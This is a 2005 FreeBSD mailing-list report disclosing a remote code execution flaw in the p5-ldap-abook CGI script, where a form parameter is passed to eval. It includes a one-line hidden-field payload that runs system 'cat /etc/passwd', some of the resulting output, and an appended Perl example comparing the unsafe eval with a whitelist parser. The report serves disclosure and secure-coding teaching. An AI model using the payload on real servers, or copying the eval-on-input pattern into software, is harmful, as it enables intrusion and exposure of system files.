FreeBSD Port: p5-ldap-abook-1.00
Roman Mashirov
mrj at mrj.spb.ru
Fri Nov 18 01:49:59 PST 2005
Hi!
This CGI script contains remote code exec. In the following code (line 128):
my $attr = eval $query->param(entry);
the script directly evaluates a CGI parameter received from the client, so <input
type=hidden name=entry value="system 'cat /etc/passwd';"> leads to the
following output from the script:
# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
# root:*:0:0:Charlie &:/root:/bin/csh
and so on
WBR
--
MRJ
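An added example, not the port's code nor anything from the reporter, that puts the eval pattern quoted above beside a parser that accepts data only. It assumes (an assumption, since the report does not say) that the entry parameter was meant to carry a hash of LDAP attributes such as { cn => 'Jane Doe', mail => 'jane@example.org' }.

```perl
#!/usr/bin/perl
# Added example (not the port's code). Assumes the 'entry' parameter was meant
# to carry a Perl-style hash literal of LDAP attributes (assumption).
use strict;
use warnings;

# Unsafe: eval compiles and runs whatever the client sent (the reported bug).
sub parse_entry_unsafe {
    my ($raw) = @_;
    return eval $raw;
}

# Safe: a hand-written grammar that recognises only { key => 'value', ... }.
# Keys must come from a fixed list of LDAP attributes; values are single-quoted
# strings with no quote or backslash characters. Anything else is rejected.
my %ALLOWED = map { $_ => 1 } qw(cn sn givenName mail telephoneNumber o);

sub parse_entry_safe {
    my ($raw) = @_;
    return undef unless defined $raw;
    $raw =~ s/^\s*\{\s*// or return undef;   # opening brace
    $raw =~ s/\s*\}\s*$// or return undef;   # closing brace
    my %attr;
    while (length $raw) {
        # one "key => 'value'" pair, followed by a comma or end of input
        $raw =~ s/^(\w+)\s*=>\s*'([^'\\]*)'\s*(?:,\s*|$)// or return undef;
        my ($k, $v) = ($1, $2);
        return undef unless $ALLOWED{$k};    # unknown attribute name
        $attr{$k} = $v;
    }
    return \%attr;
}

# Constructed inputs: a legitimate entry and a string that is code, not data.
my $good = "{ cn => 'Jane Doe', mail => 'jane\@example.org' }";
my $bad  = "system 'x';";

my $entry = parse_entry_safe($good);
print "good -> cn=$entry->{cn} mail=$entry->{mail}\n";
print "bad  -> ", (defined parse_entry_safe($bad) ? "accepted" : "rejected"), "\n";
```

The safe parser returns a hash reference for well-formed input and undef for everything else, so the script never hands client-supplied text to the Perl compiler.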